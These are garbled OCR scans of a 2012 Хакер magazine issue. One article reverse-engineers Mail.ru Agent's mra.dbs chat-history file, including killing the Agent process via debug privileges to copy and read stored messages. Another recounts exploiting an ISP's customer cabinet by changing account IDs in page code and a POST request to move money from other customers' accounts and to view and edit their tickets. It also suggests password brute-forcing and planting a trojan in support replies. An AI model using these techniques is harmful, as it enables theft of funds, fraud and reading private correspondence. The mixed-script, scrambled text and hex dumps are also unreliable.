ковыряли этот файл в Н Е Х-редак т оре, пытаясь най т и структуры

~сы,лки на смещения и всевозможные изменения после запуска' al

.гu Агента. К концу

201 О

года после долгих поисков формат

все-таки покорился.

ХАКЕР

060

www.epidemz.net

04/159/2012


Взлом

КАК ДОБЫТЬ ФАЙЛ MRA.OBS? Ты, конечно, задашься воnросом: а где, собственно, хранится

э тот nресловутый mгa.dbs, и как его добыть? Файл mгa.dbs

хранится в nапке <<%APPDATA%\Mгa\Base\mгa.dbs» [наnри-

мер <<C:\Documents and Settings\useг\Application Data\Mгa\ Base\mгa.dbs>>], и заnолучить его nри выключенном Агенте не так уж и сложно, достаточно лишь исnользовать функции

ExpandEnviгortmentStгings и

CopyFile.

Однако nри включенном

Агенте файл mгa.dbs является занятым и система nопросту не nозволит его исnользовать. Для решения этой nроблемы можно,

наnример, временно отключить Агент [для этого действия тебе nонадобятся nривилегии отладчика, которые можно nолучить

странство своего nроцесса. Также можно nроче с ть файл наnря­

ro

'13 C'i

10 00 00 00 06 00 00 00

00 00 00 00 00 00 00 00

ot

оо оо оо

лr

01

оо оо

оо

оо

~00

оо

во

0'\ 00 00 00 07 00 00 00 Сб

01 00 00 0'1 00 00 00

09 00 00 00

01 00 00

01 00 00

03 00 00 00 18 00 00 00

00 00 00 00 OD 00 00 00

86 01 00 00 01 00 00 00

J.O 01 00 00 01 00 00 00

А2

00 00 00 00 00 00 00 00

ал оо

01 00 00 00 8[ 01 00 00

01 00 00 00 1D 00 00 00

00 00 00 00 06 00 00 00 76 01 00 00 07 00 00 00 ОА 00 00 00 4С 01 00 00

20 00 00 00 06 00 00 00 01 00 00 00 60 01 00 00

07 00 00 00 26 00 00 00 эе 01 оо оо 01 оо оо оо

06 00 00 00 00 00 00 00 4 С 01 00 00 01 00 00 00

эо 00 00 00 06 00 00 00 01 00 00 00 эс 01 00 00 01 00 00 00 00 00 00 00 74 оо 6r оо 72 оо 79 оо

00 00 00 00 00 00 01 оо оо оо эr 01 00 00 00 00 6D 00 sr оо 67 оо -:; 1 оо 6С 00 2Е 00 72 00

'! С

00 6D 00 61 00 €9 00 69 оо 72 оо б r оо 6r оо

01 00 00 00

04 01

01 00 00 00

0'1 00 00 00 00 00 00 00

только сnравами Администратора] или найти открытый хэндл файла в сис теме, а затем nродублировать его в адресное nро­

rt

0'1 00 00 00 07 00 00 00 86 01 00 00 01 00 00 00

01 00 00 01 00 00 00 оо оо

ot

оо

оо

64 0 1 00 00 01 00 00 00

00 00 оо

оо

72 00 7l оо 7S 00

40 00 6D 00 51 00 69 00 ЗSFA8

Off~ot.

Maii. Ru Аген т а

!; с

р

д

lC 00 00 00 01 00 00 00 01 оо оо оо ее 01 оо оо 01 00 00 00 00 00 00 00 74 01 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 62 00 00 00 00 0 1 4[ 01 00 00 09

00 01 00 00

00 00 00 00

00 00 00 00

v

ос 00 00 00 24 01 00 00 01 00 00 00 00 00 00 00 61 00 66 00 69 00 73 00

lE 00 09 00 .:Е 00 6В О оо 67 оо бr оо 2D оо 6С 00 2!: 00 72 00 75 00

m .: ~

о

r

о

у

оо

·S7

1 .:

о

35FдВ·ЭS11Э

ВЬсk.

n

а

h 1 s

• '

• . ' u m а 1 1.

о

-

Sixe.

lбС

Ид е н т ифи ка торы нач а л а n е реnи ск и

мую с диска [nравда, для этого нужно знать, что такое кластер

и как работать наnрямую с драйвером файловой систе мы] или же наnисать собственный файловый драйвер [это nрактически

pid;pe32.th32ProcessiD; break ;

нереально]. Все бы хорошо, но на nрактике у всех вышеnере­ численных методов есть свои недостатки. При nеречислении

хэндлов с nомощью ZwQueгySystemlnfoгmation и их коnировании к себе в nроцесс с nомощью

DuplicateHandle

while (Process32Next( hProcessSnap,

&ре32

));

можно столкнуться

CloseHandle( hProcessSnap );

с двумя nроблемами. Первая заключается в том, что nри вызове ZwQueгylnfoгmationFile nоток может nовиснуть, ожидая отклика от блокирующего именованного канала. Вторая- nосле коnиро­

вания оба хэндла [наш и открывшего файл npoцeccal будут ука­

После того как мы найдем

PID,

нам необходимо получить

а следовательно- текущий режим

nривилегии отла дчика SeDebugPгivilege [OpenPгocessToken >

ввода-вывода. Позиция в файле и другая связанная с файлом

LookupPгivilegeValue > AdjustТokenPгivilegesl и убить nроцесс

информация будут общими у двух nроцессов, nоэтому даже

[OpenPгocess > TeгminateProcessl, а потом снова поnытаться вы­

чтение файла вызовет изменение nозиции чтения и нарушение

звать

нормальной работы nрограммы, открывшей файл . Конечно,

nутем- через

зывать на один

FileObject,

CopyFile.

Привилегии можно получить и более элегантным

Native API:

можно nриостановить на время все nотоки nроцесса файла, а nо­ сле коnирования восстанавливать nозиции чтения и заnускать

void GetPrivilege(IN ULONG Pr ivi l ege)

nроцесс владельца снова, но это связано с большими затратами

{

BOOLEAN OldValue; RtlAdjustPrivilege(Privilege, TRUE, FALS E, &Ol dVal ue);

времени и сил. Казалось бы, идеальным методом может являть­

ся nрямое чтение с диска, но и здесь есть недостатки. Таким сnособо м можно читать только файлы, которые открываются

с достуnом F ILE _ READ _ AП RIBUTES [кроме файлов nодкачки], файл обязательно должен быть не сжат, не зашифрован [иначе

Все, mгa.dbs у нас в руках. Теnерь nерейдем к его nотрошению:].

мы nрочитаем ерунду] и иметь свой кластер [маленькие файлы

РАСКРЫВАЕМ СЕКРЕТЫ

в NTFS могут целиком размещаться в MFТI. Также следует

MRA.OBS

учесть, что во время чтения файл может быть изменен [и мы

Файл mгa.dbs nредставляет из себя дамn nамяти Mail . гu Агента,

nолучим в результате неnонятно что]. П оэтому разберем самый

nоэтому открыть его для чтения nри работающей nрограмме не

nростой метод с временным отключением nроцесса Агента. Итак, чтобы убить nроцесс Mail.гu Агента, для начала не­

nредставляется возможным [для рядового nрограммиста, но у нас

свои сек реты

:1, также задачу усложняет тот факт, что

в nамяти

обхо димо узнать его идентификатор [PгocessiD]. Сделать это

все числа хранятся в nеревернутом виде. Однако давай немного

можно разными сnособами: через

углубимся в реверс-инжиниринг.

TooiHelp API, через Native API

[исnользуя функцию ZwQueгySystemlnfoгmation], nрошерстив

Итак, в недрах mгa.dbs существуе т хеш-таблица, в которой

сnисок открытых хэндлов или по сnиску открытых nроцессом

оnисаны смещения на 4-байтные идентификаторы. Идентифика­

окон [GetWindowThгeadPгocessld[ . Самый легкий вариант- это

торы с лужат для оnределения начала заnиси различных структур

исnользование

и сегментов дамnа, среди которых и находятся нужные нам записи

TooiHelp AP I и

n оиск по имени ехе-файла. Для

этого достаточно вызвать функции CгeateToo lhel p32Snap shot >

истории nереnиски [обрати внимание на соответствующую иллю­

Pгocess32Fiгst > Pгocess32Next, а затем в теле цикла сверять

страцию]:

значен ие nоля

szExeFile структуры PROCESSENTRY32 с magent.

ехе . Необходимый нам PгocessiD находится в этой же структуре, nоле th32 P гocessiD:

hProcessSnap; Creat eTool help32Snapshot (TH32CS_SNAPPROC ESS, e ); if ( I NVALID_HANDLE_VALUE !; hP rocessS nap)

typedef struct - ids { unsigned int idl; unsigned int id2; unsigned int count; _ids;

{ Начало истории характеризуется ключевым словом

pe32 .dwS i ze ; sizeof ( PROCESSENTRY3 2 ); if ( Process32 First( hP rocessSnap, &ре32 ) )

mгahistoгy_, за которым следует

{

и

e-mail

e-mail

хозяина файла mгa.dbs

контакта, с которым ведется nереnиска. В случае с исто­

рией идентификаторы образуют двусвязный сnисок: nервый ведет

do

к nервому отnравленному сообщению, а второй - к nоследнему

if(e {

Х АКЕР

lstrcmp(pe32.szExe File,_TEXT("magent.exe" )))

nринятому сообщению . Количество сообщений можно узнать,

изучив четыре байта nосле идентификаторов [структура _idsl.

061

04/159/ 2012

www.epidemz.net


взлом

71 01

оо оо

со 9С

sr

07

оо оо оо

DS 69 87 св 01

~~ ~~ ~~ ~~

::

се

01

оо оо iMfMШMШ M !,Mji ! ,М.!.Моо оо оо

07 оо оо оо

D oo

оа оо

~~ ~~ ~~ ~: ~~ ~~ ~~ :~ ~~ ~~ ~~

lB 0 4

04

З1

04

ЭВ

3

4

5

б

7

00000000

01 00 00 00

О

~

0'1 00 00 00

СО

9'1

А2

02

01 60 AD 02 01 80 82 02

00000010

!о ЛО l!E 02

02iEA010

01 2 0 ВВ 02 0 1 00 Bl 02

01 АО Аб 02 01 С О 81 02

00000020

69 29 01 00

024ЕАО20

01

Off!let

b r оо оо оо эs оо оо

::':-",.-+.,::;;;:;...,..._r·

Структура заnиси сообщения

1

2

З

О

Off!let

1

АО

2

81 02 01 60 Bl 02

8

01

9

ЕО

А

В

А9

С

Е

D

02 01 20

АА

r

02

Пои ск х еш -таблицы

Пр ойдя по смеще нию идентификатора [его можно узнать из хеш­

стру ктуре х рани тся количество записей истории или, проще

таблицыl·мы попадем на запись сообщения [с н ова все внимание на

говоря, количество переписок. Так как файл дампа постоянно

соответствующий рисунок] :

расширяе т ся, то по с мещению Ох2С лежит иден т ификатор посл е д ­ ней записа нной истории ,- это все, что нам нужно знать, чтобы

struct _message

начать искать идентификаторы переписок .

В целом же алгоритм такой: пр охо димея по идентификаторам записей истории с пом о щью

int size; int prev_id; int next_id; int xz l ; F ILEТIME time ; unsigned int ty pe_mesage ; char fiag_incoming; char Ьуtе( З ]; unsigned int co unt_n i ck; unsigned int magi c_n um; 11 ехзв unsigned int count _message; unsigned int xz2; unsigned int size_lps_rtf; unsigned int хzЗ;

unsigned unsigned unsigned unsigned

цикла [начиная от последней добавленной записи]; если в этой записи о т смещения Ох190 присутствует слово «m г ahistoгy_>>, то это означает, что по смещению Ох24 лежат идентификаторы цепочки сообще ний данной переписки. Ч тобы стало немного понятней, взгляни на этот ко д:

DWORD * offset_taЫe=(DWORD *)(mra_base + *(DWORD*)(mra_base + exle )); DWORD end_id_mail= *( DWORD*)(mra_base+ex2e+ offset_taЫe[ l ]);

DWORD count_emails= *( DWORD*) (mra_base+ex2C+ offset_taЫe( l ]);

}; for ( int i=e ;i <c ount_emails;i++) Строки в дампе сох раняют ся в кодировке Unicode [wchaг_tl различными способами :

{

id s *mail_data =( struct _id s* )(mra_base+ offset_taЫe(e n d_id _m ail]+4 );

с завершающи м нулем в конце строки;

в структуре LPS [название структуры взято из описания фор­ мата протокола ММР], гд е первые ч е т ыр е байта указывают на

if (memmem((( unsigned char *)mail_data+ex 19e ), mrahistory, ... ))

длину последующей с тр оки; в формате

emails[k].id=(_ids *)(( unsigned char*)mai l _data+ex24 );

RTF.

Зная количество сообщений, нам не составит труда пробежать­ ся по всей цепочке. Н о о т куд а вообще узнать, где находится эта

end_id_mail=mail_data- >id2;

хеш -таблица, и как на йти начало за пи сей истории? Над поисками ответов к эт им вопросам мы с

SOLON 7 провели

немало бессонных

кадим

ночей.

Журнал не резиновый, п оэтому исходный код читалки mгa.dbs ищи

НЕМНОГО МАГИИ По смещению

OxlO

на диске. Сейчас я покажу тебе лишь самые ос новны е моменты.

от начала файла mгa.dbs, как оказалось, и хра­

Итак, файл mгa.dbs является дампом памяти, поэтому мы не буде м

ни т ся а др ес завет ной хеш-таблицы. Пр ойдя по с м ещению первого

извращаться и использовать функции для работы с файловыми

ин д екса из хеш-таблицы, мы н а тык ае мся на структуру нача ль­

смеще ниями, а сразу поместим его в память нашей прогр аммы. Дл я

ных данных. В озможно, там находится вообще вся информация,

этого заюзаем ресурсы ОС

заложенная в mгa.dbs. Ид ем дальше. П о смещению Ох20 в этой

файл:

Windows

и создадим М еmо г у

Mapp ed

ТИПЫ СООБЩЕНИЙ MRA.DBS

н е автори зо ванны е

з апро с ы

обычны е

п ере д ача

за п иси

сме н а

п о льз о ват е ли

автори з ации

с ообщ е ния

фай л о в

в мик р об л о г

г ео п о ло же ни я

ХАКЕР

062

www.epidemz.net

04/159/2012


Взлом Maii .Ru Агента

•-.,История

Правка

Контакт

?

gar .i .k@rnail .ru

26

25amelia~~mail.ru

235

Здравствуi1те! Пожалуйста 1 добавьте r-1еня в ва ш сnисок ко нта ктов.

_Ыock-hea r1_@inbox.ru

_r~ o_1 23@moi l .rtr

Amelia frank

08071961 @moil.ru 11 333695@chat .ogent 24201 @moil.ru

1

Здравствуй ! Как через тел.сот. Загрузи т ь фотку в анкету 1 что бы Nеня

16 94

401204 7@chat .agenl 534147@rnoil.ru 666clirnakat999@rnail.rtl 98tirn@rnail.rtl a_a_a_palevo@rnail.ru abdulrnanova_regina@rna abrarnova--alena@rnail.ru abyss .90@inbox.ru adelina-56x@rnai1.ru ademulko@rnail.ru afanasij286905@rnail.rlJ ailitakiyakbaeva@lnail.ru air -trading@rnail .ru aist_ @rnail .ru ako880@rnoil .ru alblna _vladikovkaz@rnail .ru alblno654@rnail.ru

Посмотреть а ват ар

мон ~1нр

_j

::;;0 Блопt

~ --

1

12

а х рен знает

массива, она позволяет хранить пары «К ЛЮЧ­ значение н.

Двусвязный список состоит из элементов данных ,

каждый из которых

blt.ly/zsTJТb:

содержит ссылки

Жаль,чеt·1 зани 1·1а е ш ься?

Г Р• к Дж:ан

три метода

так и на nредыдущий

файлами:

элементы .

blt.ly/zNg02S;

An1elia Frank

способы получения

Я не буду о твле кать надеюсь ф~tлы·l интересн.

как на следующий,

работы с занятыми В даННЫЙ f·10f>IBHT К ИНО (110ТРЮ

различные

списка процессов :

bit.ly/w4upz5; •

умень шение

размера Си­ программы на

nримере

<# # #20# # #imgOOO > 27

cOdedgarik.Ьiogsoot .

интерфейс

An1elia frank

Amelia frank

29

мой благ :

реализующая

ассоциативного

роs-файлов :

Г ар.·к Дм 111

9 3

Hjstory Reader: blt.Jy/x2oKvU;

• С++ класс для создания wiпhe x.

Г ар." д к. н

прикольный

51

blt.ly/z2EТMY: • обсуждение Mail.ru

Хеш-таблица- это структура данных ,

5.4:

=

видели.

t~*~фФф~ - Ш-~®~·a~.~Ш®~·I'DI111111r..~~c~w З48241@rnail .ru Скоnировать E-mail

Mail.ru

Агента до версии

Почта

_bek_@inbox.rtj

Описание формата

истории

января 2011г.

Visual

Studio: blt.ly/w7sWNA.

января 2011г.

Amelia frank

4

Добр.ноч~1 !ка к фильио прооютр?

v

Интерфейс моей читалки

После прохода по и дентификаторам и поиска строки «m гahistoгy_>> наша структура будет заполнена адресами иден­

Create Fil e CreateFileMap MapViewOfFil e VirtualFree CloseHandle CloseHand le

тификаторов. Заметь, при этом мы не скопировали даже байта

и израсходовали всего лишь 16*count_emails байт /напри м ер, при 1 000 контактов мы используем всего -15 килобайт памяти). Теперь, имея на руках идентификаторы начала переписки с конкретным пользователем, мы можем прочитать сообщения:

Так как нам не нужно сохра н ять внесенные изменения обратно в файл, то здесь вместо UnmapViewOfFile используется Viгtuai F гee. Первое, что мы сделаем, это найдем все контак т ы из истории пере­ писки. Хранить найденное добро будем в структуре emails:

int id_message=emails[k] .id->id l ; for ( int i= e;i <emails[k].id->count_me ssages; i++) { _message* mes = (_message*)(mra_b ase+ offset_t aЫe[id_m essage]);

typedef struct _emails{ wchar_t *e mai l ; ids * id ;

wchar_t * str = ( wchar_t *)(( unsigned char * )mes + sizeof ( _me ssage));

};

id_message=mes->prev_id;

struct _emails *ema ils; Дата сообщения хранится в форма т е FILETIME, для удобства

emai l s=VirtualAlloc(e,count_email s* sizeof ( struct _emai ls) , .. );

ее можно перевести в удобочитаемый вид с помощью функции

FileTimeToSystemTime. Формат RTF отлично воспринимается Rich Edit'oм и любыми другими стандар тными редакторами типа WoгdPad. Но с этим можно и не заморач иваться, так как сооб щ е­ ния хранятсявнеотформатированном виде сразу после ни ка, а их

RICH ТЕХТ FORMAT (RTF)

размер указа н в структуре message. Это все, что тебе нужно з н ать, чтобы получить удобоваримый список мессаг из А г ента.

RTF,

использующийся в

mra.dbs,

nред ставляет из себя формат

х ранения разм еченных документов , пр е дложенный еще в бо родатыми программи стами из

1982 году

Microsoft и Adobe . Для е го парсинга

P.S. К сожалению, формат журнала не позволяет привести здесь мои хардкорные изыскания полностью, поэтому поспеши заглянуть на

с овершенно не обязатель но изобретать велосипед , а достаточно

диск. Надеюсь, пример кода читалки lехе'шник ко т орой, кстати, с по­

лишь отправить сообще ние

мощью небольшой оптимизации уместился всего в 2 килобайта безо

з аписи и

EM _S TREAMOUT

EM _S TREAMIN с SF_ТЕ Х Т

с флагом

флагом

SF_ RTF

для

всяких пакеров) поможет тебе в написании быстрого и кру т ого С-кода,

для чтения:

а также в изучении hех - редакторов и других низкоуровневых вещей.

ED ITSTREAM es = { е }; es .pfnCallba ck = EditStreamCallba ck; es. dwCookie = ( DWORD_PTR)&lps; Se ndMess age (hR i c h, EM_STREAMIN, SF_R TF, ( LPARAM)&es);

Кстати , незатронутой осталась не менее увлекате льная тема чтения

истории IСQ-переписки, которая также хранится в файле mгa.dbs. Спасибо компании Maii.Ru, во-первых, за разработку Maii.Ru Агента, во-вторых, за заметное развитие любимой аськи, и в-третьих, за

интересный к вест, о котором я тебе сегодня рассказал. :Х:

ХАКЕР

063

04/159/ 2012

www.epidemz.net


взлом

Daeren Torn

Вся информация предоставлена исключительно в ознакомительных

целях. Ни редакция, ни автор не несут ответственности за

халявщика НЕ ВЫДУМАННАЯ ИСТОРИЯ О СЕРЬЕЗНЫХ УЯЗВИМОСТЯХ

ПРОВАЙДЕРА

любой возможный вред, причиненный материалами данной статьи .

Эта история взлома была бы ничем не примечательна, если бы не одно « НО ». Жертвой глупейших ошибок программистов стал довольно крупный провайдер. Элементарные уязвимости в личном кабинете пользователя позволяли манипулировать денежными средствами на счете

любого из клиентов . Такое Увы, и такое бывает.

www.epidemz.net


Буд н и ха л яв щ и к а

Осноаноii счеr:

Баланс:

-

09

216

рvб.

ОТВЕТ НЕЗ

Кабинет nоль3 ооателя:

ЖДАТЬ,

дбо н е•п , уже сеИ~ас у Вас есть В ОЗ'"~ОЖность nодкпючиться к услуге кабельного

п

информацию по nодключению и активации настояшей услуги Вы можете у l""еНеДЖQ ра КО"''П Э НИИ По.а робнее о траi'!С/1 11руеш,,х ICII IЧt!IIIX

А

Tapщ!!DI

бонуса Ba"'' необходи..,о: nодключить к сети нашей ко11nании своего друга. или родсrвенмика и Вы nолучите бо1-1ус в раз"'ере 300 рублей на свою учетную запись. попучения бонуса no акции «Приведи друга• еобходимо учесть следуюшие условия:

• 1. • 2.

e5o.;etft"O,. комnан• • и .apyr npo.IКиo.aer 11 аоне .соторы•i

еы яе.nяеrесь

В.,w 1шееrтехtшчес<vю ео~НО)I(nССТЪ nоаi(Jiюченш:• к cen1 (ссылJ<а) • 3. Ваш •npyr• .!iiКIIIOЧiler дОГРISОР С HIIWe~ KOHПIIHI1eЙ Hll П0д'</110ЧеН11е К Cef\.l\1rпept'leT, YICII]ЫII<!JЯ Прl! ЭtnH 8lJiWИ ФНО 11 l!lдpec ПОЛ!(JiоQЧенир

nосле nодключемия ~друrа> на Ваш счет поqупит бонус в раз ... ере исnользовать на любые достуnные в личном каби11ете услу~. больше друзей Вы nриведете, те11 больше бонусов nолучите!

300 рублей, которые

После

*****09 *****6 1 ***** 60

-85 р

Основной

-7lp

Ин тер н е т

ер

счет

Т елеви де н ие

Как ни стр анно, данная операция прошла успешно.

Epic fail .

Интернет, впрочем, у меня от этого не появился, поэтому я снова обратился к html-исходнику страницы своего личного кабинета. Изучив его более подробно, я заметил следующие input-npeфикcы:

Перевод с редсrв между уч етны ми зап и сями.

<<m_fгom>> и Счет для сn нсання

Услуга

Ба л<~ н е ( ру 6.)

ЛОГ)!Н

09 61

С чет для nоn оnнен ня

Балан с ( ру6.)

Лоrнн

216

Осноаноii сче т

578.51

~tнтернет

60

<<m_to>>. Все

указ ывало на то, что это были идентифи­

каторы счетов в БДI Здесь возник резонный вопрос: отслеживает ли сервер подмену

Недолго думая , я стал проверять свою до­

10?

гадку: изменил две последние цифры в поле <<m_fгom>>, примен ил

09

578.51

61

изменения, выбрал нужные счета и нажал на кнопку <<Оnлата» . Заnрос с измененным

60

10 ушел

на сервер . Ответ не заставил себя

ждать,- показалась форма с предложением перевода средств.

Бингоl Номер счета, откуда будут переведены средства, не со­ вnадал с моим номером, а в поле <<Укажи те сумму» была указана

Стра н ица п е р е вода с р е дс т в

сумма, равная количеству сре дств на счете, с которого осущест­

влялся перевод. Как ты помнишь, на моем счете в тот момен т было

ВВЕДЕНИЕ

-85

История началась очень странно. На календаре было

31

декабря,

рублей , а форма предлагала мне nеревести все

2901

Указав

немноги м меньшую сумму [для незаметности), я нажал <<Переве­

а на н аутбуке- дисконнект. Средства на счете закончились,

сти>>,- и оnерация завершилась успехо м . Значит, уязвимость есть,

и было совершенно непонятно, что дальше делать всю ночь без

сервер не проверяет

интернета [в новогоднюю-то ночь?- при м. редакции!? На счете

сты, бравоl Вернув деньги обратно, я решил углубиться в nоиски

Webmoney

не было достаточно денег, чтобы полностью оплатить

10

на привязаннесть к аккаунту. П рограмми­

других ба го в. Тут сразу стои т отметить, что все эти эксперименты

абонентскую nлату, nоэтому я уже готов был идти к ближайше­

могли серьезно испортить мне жизнь,- повезло, что провайдер

му терминалу оплаты. Зайдя в личный кабинет, чтобы уточнить

решил не обра щаться с за явлением о моих действиях в правоохра­

сто имость абонентки, я обратил вниманиенанеактивные

нительные орга ны. В такой ситуации оправдаться у меня уже не

html-

переключатели, расположенные на странице перевода средств.

П охоже, Дед Мороз все-таки существует:).

получилось бы.

У ЧЕТ ОПЕРАЦИЙ

БЫТЬ ИЛИ НЕ БЫТЬ?

Итак, предыдущая находка меня очень обрадовала. Теперь

Дальше я пол ез в исходный код страницы с nомощью браузера

осталось узна ть, насколько видны мои действия второму лицу.

Орега и убрал у соответствую щих переключателей nараметр

Ведь у каждого уважающего себя провайдера есть такая вещь как

«disaЫed>> [когда баланс равен нулю или отрицательный, то дан­

статистика/история платежей, nредназначенная для то г о, чтобы

ный переключатель неактивен). После этогонехитрого действия я

следи ть за nередвижением средств на счетах. Перейдя к истории

примен ил изменения и поnробовал перевести все средства с тре­

nлатежей, я снова открыл исходный код страницы. Немного поли­

тьего счета на nервый- основной:

став е го, я сразу заметил тот же самый способ работы с

10. Для

его

передачи серверу исполь зо валась строка следующего вида:

До

***** 09 ***** 61 *** **60

lSp -71р

1 Основной счет 1 Интерне т

-100pl

<input type=button vа l uе= 'Показать' name=show_orders_lis t onClick= 'showPay(this.form, *** 39)' >

Телевиде н ие

<td style='background-color:#D2FFCF;'><input type='radio' name= m_from' id='m_from </b></label></td> <td style='background-color:#D2FFCF; '>216</td> <td style='background-color:#D2FFCF;'><b>O cнoвн oй счет </Ь></td> <td style='background-color :#D2FFCF;'><input type='radio' name='m to' id='m_to~ 7' b></label></td> <td style='background-color:#D2FFCF; '>216</td>

' value=' lll00' ><label

value=' ~ 7'><label

П е рвы й ба г с п е реводам с р е дств

Х АКЕР

04/159/2012

065

www.epidemz.net


. ВЗЛОМ

Здесь я снова изменил

ID

и немедленно нажал «Показать»,­

о п ять ус п ех: я увидел все операции со средствами на чужом

ID!

Н о там был и мой след . Значит, все мои действия с деньгами были

заметны второму лицу. Однако все равно здесь не было видно, куда и почему они были переведены, -таблица предс т авляла из себя

три столбца: « Д ата>>, <<Сумма [руб.!>> и «Номер учетного документа>>.

Для получения f:loнyca Вам неоЬходимо: подключить к сети нашей компании своего друга,

знакомого или родственника и Вы получите бонус в размере 300 рублей на свою учетную заnись. Для nолучения бонуса по акции «Приведи друга» необходимо учесть следующие условия: • l. в~ ll&.nя етесь обон е нтом • 2 . 8iЩI друГ ПРОЖИIIОеТ 11 .QO,..I!, KOTOJ)Ыii IIM!!eT TeXнi\ЧeCii.YIO 1103НОЖН О СТЬ ПOliКIIIOЧI!tШЯ lt Ct: ТII {CCbi/IK~) • ), BI!IW друГ• 31!1К/\ЮЧОеТ ДОГОООJ) С HIIWeЙ KOHПIIHIII!a на П0lЖ11ЮЧеНIН!! К CI!ПI llнтермет, YK031:>11!111R ПPII ~ТОН В&WII Ф~IQ

11

о.арес ПO.QI(IIIOweнlt$1

Сразу nосле подключения «друга:. на Ваш счет nоступит бонус в размере

300

рублей, которые

.можно использоват ь на любые доступные в личном кабинете услуги.

Чем больше друзей Вы приведете , тем больше бонусов получите!

БОЛЬШЕ, БОЛЬШЕ КРОВИ! Ладно, с этим все ясно, но что можно сделать еще? На глаза по­ палась кнопка «Запрет доступа>>, отключающая все предоставляе­ мые провайдером услуги. Работала она также с

ID и JS . Конечно,

увидеть работоспособность этой вещи я н е мог. Или же можно было написать скрипт, который прошелся бы по списку

ID

и отключил

всем пользователям интернет/телевидение/телефон-даешь хлеба и зрелищ :1. Однако одним запретом доступа я ограничи­ ваться не захотел и попытался разобраться во всем этом на более

ПOKi!JliiТЪ JliiПPOCЫ Эlllroлoaoи: СтраН\\UЫ: Авт ор:

Я Hllllb111

..

COJ.QliiTb 3liiПpoC

3lllnpocn:

Автор : 1<

НЕ работает мнтернет

1

К

0110110Wlll 1 ПОГ11l11ЛьТе

О;р~гкn•роsг"

Дата :

2012·02•02 12:40:45

нен" • "' _ "'•

2012·02·02 13:16:54

глубоком уровне . Итак, вернувшись к о п ерациям над средствами, я запустил Добаамть новое сообщен и е

прогу Chaгles [chaгlespгoxy.com- замечательный снифер, дебаггер и прокси-сервер в одной упаковке!. Но данные шиф­ ровались, и ничего толкового я не увидел. Тогда я запустил

IE

с плагином ieH T TPHeadeгs, перешел в личный кабинет и произвел

Ти кеты с л уж бы п одд е р ж ки

уже з н акомую тебе транзакцию средств с одного счета на другой. ie HT T PH eadeгs показал следующий запрос:

она на методе

Basic Autheпticatioп.

Мне хватило всего пары минут,

чтобы накидать программу для бр у тфорса. Благо, все дороги были

POST /client. php

о ткрыты, а доступ в личный кабинет ос у ществлялся по локальной

xjx f uп = chaпge C hack&x j xargs[ ]= *** 1 8&x j xargs[ ] =* ** 39&

се ти , т о есть интернет не был н у жен, и все могло произойти очень

xjxargs[]=12e . e

и очень быстро ...

Вп ос ледствии я рассказал об обнаруженной уязвимости !Т­ Здесь ключи массива такие:

счет,

3- скол ь ко

1-

с какого счета,

2-

на какой

денег п ереводить. Д алее я решил попробовать

сформировать аналогичный предыдущему GЕТ-запрос и перешел

отдел у провайдера , так что она была довольно быстро исправлена. Ошибк у объяснили тем, что «все работало через хитрую схему,

ПОЭТОМ У так глупо И ВЫШЛО>>

:J.

по сформированной ссылке. Все снова работало, средства перево­ дились. Я думаю, теперь ты понимаешь, что можно было натворить

при помощи базовых знаний

JS

и больной фантазии? К слову, тут

НОВЫЕ БАГИ Проходит день, неделя, месяц, и у меня появляется желание про­

мне вспомнился фильм }{ОТТfаБЬIЧ: «-А сколько качать-то? - Че

верить что-нибудь еще в личном кабинете. Я открыл страницу

ты тупые вопросы задае ш ь? Миллион качайl».

просмотра статистики, изменил

10,

отправил запрос. В итоге на

моем экране вновь отобразилась чужая статистика. Оказалось,

ЧТО-ТО ЕЩЕ?

что после прошлого исправления корректно стало работать только

Д алее я подумал, что можно копнуть еще глубже. В самом начале

тот раздел личного кабинета, где осуществлялся перевод средств,

каждого из html - исходников была такая строка: js/fuпc . js. Хорошо,

а все остальное так и осталось по-прежнему. Я не захотел ковы­

формирую ссылку, перехожу по ней и вижу реализацию функций

ряться дальше со старыми багами, поэтому попробовал найти еще

операций на сай т е . Самой нужной мне вещью оказалась функция

места, где использовался столь оригинальный метод работы с кон­

saveNewPass[l - она работала по той же схеме ID+JS. Как ясно из

фиденциальными данными пользователей. Тут стоит заметить, что

названия, предназначена эта функция для смены пароля пользо­

меня уже давно интересовал раздел <<Электронные заявления>>.

вателя. Все, что нам надо, - код, который бы осуществлял про­

Зайдя туда, я создал бессмысленный вопрос: <<Почему

стейший перебор по словарю и менял его при условии нахождения

привязывается к учетной записи?>>. Страница с вопросом содержа­

e-mail

не

верной ~омбинации. Какова вероятность того, что все пользова­

ла довольно интересную информацию : ФИО

тели изменили стандартные парали [обычно состоящие всего из

вала возможность правки сообщения, а вот кнопка удаления не

нескольких цифр!? Кстати, тут не было даже банальной капчи или

работала. В исходном коде нашлась такая строка:

блокировки по

IP

+ IP.

Также присутство­

при множественных ошибочных авторизациях

-

и других запросах! Да и авторизация тоже хромала- основана

са href= "JavaScript : edit_post( *** el, ***1)" class=zll><font c l ass=zll> P eдaктиpoвaть</font></a>

Я поправил значения, вычтя из каждого по

3,

примен ил измене­

ния, нажал «Редактировать>> и увидел страницу с тикетом другого пользователя! Изменив его, я попробовал сохранить вопрос,­ операция завершилась успехом. После, еще раз изменив значени е ,

я попал уже на ответ техподдержки. Поправил, сохранил,- все получилось. Значит, я могу править сообщения любого юзера! Осталось лишь найти остальные функции для работы с заявками.

и

Снова немного покопавшись в исходном коде страницы, я отыскал строку следующего вида:

cscript language= 'JavaScript' src= 'js / hd.js ' ></script> Собственно, в файле

js/hd.js и лежали функции для работы

ХАКЕР

066

www.epidemz.net

04/159/2012


Будни халя вщика

с заявлениями. Я решил использовать функцию

showTiket[n] .

Поправив код и указав произвольный номер заявления, я прим е н ил изменения и нажал на кнопку «Редактировать>>. Открылась с траница , на которой был запрос пользователя, а также ответы от

т е хподдержки. Вроде бы ничего такого, но я увидел их ФИО и

IP!

К с тати, злоумышленник в такой ситуации мог бы подождать ответа т ех п о ддержки любому пользователю, а после отредактировать

соо бщение, на'пример, так: «[качайте[ ... ] для устранения про­ блемы, но антивирус может ругаться на данное приложен и е, так

2012 · 02·02 11:02

·117.00

qOOO

ч то отк лючите его на время>>. Вуаляl Тр оя н залит, да еще и от лица

20 12 ·02·02 04:02

1.00

qOOO

провайдера.

2012·02·02 04:02

1.00

qOOO

2012·02·02 03:0 2

·15.00

qOOO

2012·02-02 03:02

зо.оо

qOOO

Хоро шо , я нашел способы редактирования, удаления, просмо­

2012 · 02 · 02 03:02

·15.00

qOOO:

тр а и отправки т икетов . Идем дальше. Вернувшись в личный

2012·02·02 03:02

·100.00

qOOO
